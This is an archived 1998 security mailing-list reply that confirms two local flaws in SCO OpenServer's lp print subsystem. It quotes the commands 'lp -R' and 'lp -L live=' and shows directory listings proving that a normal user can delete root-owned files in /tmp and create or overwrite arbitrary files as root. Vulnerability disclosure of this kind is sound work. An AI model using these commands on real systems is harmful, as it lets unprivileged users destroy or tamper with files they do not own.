Re: Security problems on SCO's lp subsystem

From: Michael L. Wilkerson Jr. (mwilkersat_private)
Date: Thu Jun 18 1998 - 18:02:46 PDT

  • Next message: Mike: "Word 98 Insecurity"

    >While casually looking for SETUID binaries in a newly installed
    >SCO 5.0.2 box, I have discovered that normal users with lp access
    >(the default) may cause headaches to the system administrador.
    >System: SCO 5.0.2 Enterprise (5.0.4 too?)
    >        Plain Vanilla Intel Server
    >OK. We are all clean.
    >Exploit 1)
    >Normal users can remove text files under /tmp. The lp command won't even
    >try to "print" (and remove afterwards) binary or executable programs.
    >There may be a way around this, but I haven't tried to find it.
    >$ lp -R /tmp/text_file_to_be_removed
    >The switch -R causes the removal of the file, after printing.
    >This exploit won't work in dirs that don't have the sticky bit set.
    Okay, I've tested these both.  My box is:
    SCO 5.0.4 Enterprise
            (also) Plain Vanilla Intel
    as root...
            echo "test" > /tmp/rootfile
    and the perms thereof are...
            drwxrwxrwt   2 sys      sys          1024 Jun 18 20:26 tmp
            -rw-rw-r--   1 root     sys             5 Jun 18 20:26 rootfile
    okay. now as a normal, unprivileged user, I run...
    lpr -d lp -R /tmp/rootfile
    ...and to my displeasure, but as expected, the root-owned tempfile is
    removed.  (BTW, this normal user is NOT a member of the group, sys --of course).
    >Exploit 2)
    >This is even better, but only works if your lp subsystem has a file named
    >/var/spool/lpd/lock. With this file in place, the lp command will enable
    >the "-L live" option. With this, you can write to *any* file in the system.
    >And even better, the file will be mode 600, owned by root...
    >Just do:
    >$ lp -L live=/any_file_in_the_system
    >And that's it. You can type anything you want/need.
    One more time!
    running "touch /var/spool/lpd/lock"
            -rw-rw-r--   1 root     sys             0 Jun 18 20:41 /var/spool/lpd/lock as the same normal user I run (with rootfile being an as of yet
    non-existing file)
            lp -L live=/tmp/rootfile
    Okay, then I enter whatever text I choose...and a ^D and bingo!
    now "ls -l /tmp/rootfile" yields:
            -rw-------   1 root     lp             21 Jun 18 20:45 rootfile
    Of course, the same normal user which created the file can now not even read it.
    Okay, now to a previously existing /tmp/rootfile with perms
            -rw-rw-r--   1 root     sys             5 Jun 18 20:52 rootfile
    ...I append, as a normal user, using the same lp exploit, whatever text I
    choose.  Now, ls -l /tmp/rootfile yields:
            -rw-rw-r--   1 root     sys            28 Jun 18 20:53 rootfile
    so, the perms didn't not become 600.  But the new text has completely
    overwritten the original text.
    One thing to note is that file /var/spool/lpd/lock did not previously exist
    before root touched it into existence.
    >I'd like to know if these problems are still valid on 5.0.4. I couldn't
    >find any mention of this problem on the SCO site. Older versions of SCO
    >may exhibit this problem, since many of these have /usr/bin/lp setuid to
    actually the perms on /usr/bin/lp are:
            ---x--x--x   1 bin      lp           2472 Jun 18 20:10 /usr/bin/lp
    and of course, lpr is a symlink to /usr/bin/lp.
    Looks dangerous!
    ======================== Mike Wilkerson ==========================
    "You cannot go on 'seeing through' things forever. The whole point
    of seeing through something is to see something through it."
    C.S. Lewis, "The Abolition of Man"
    PGP Public Key:
    ==================== mwilkersat_private =====================

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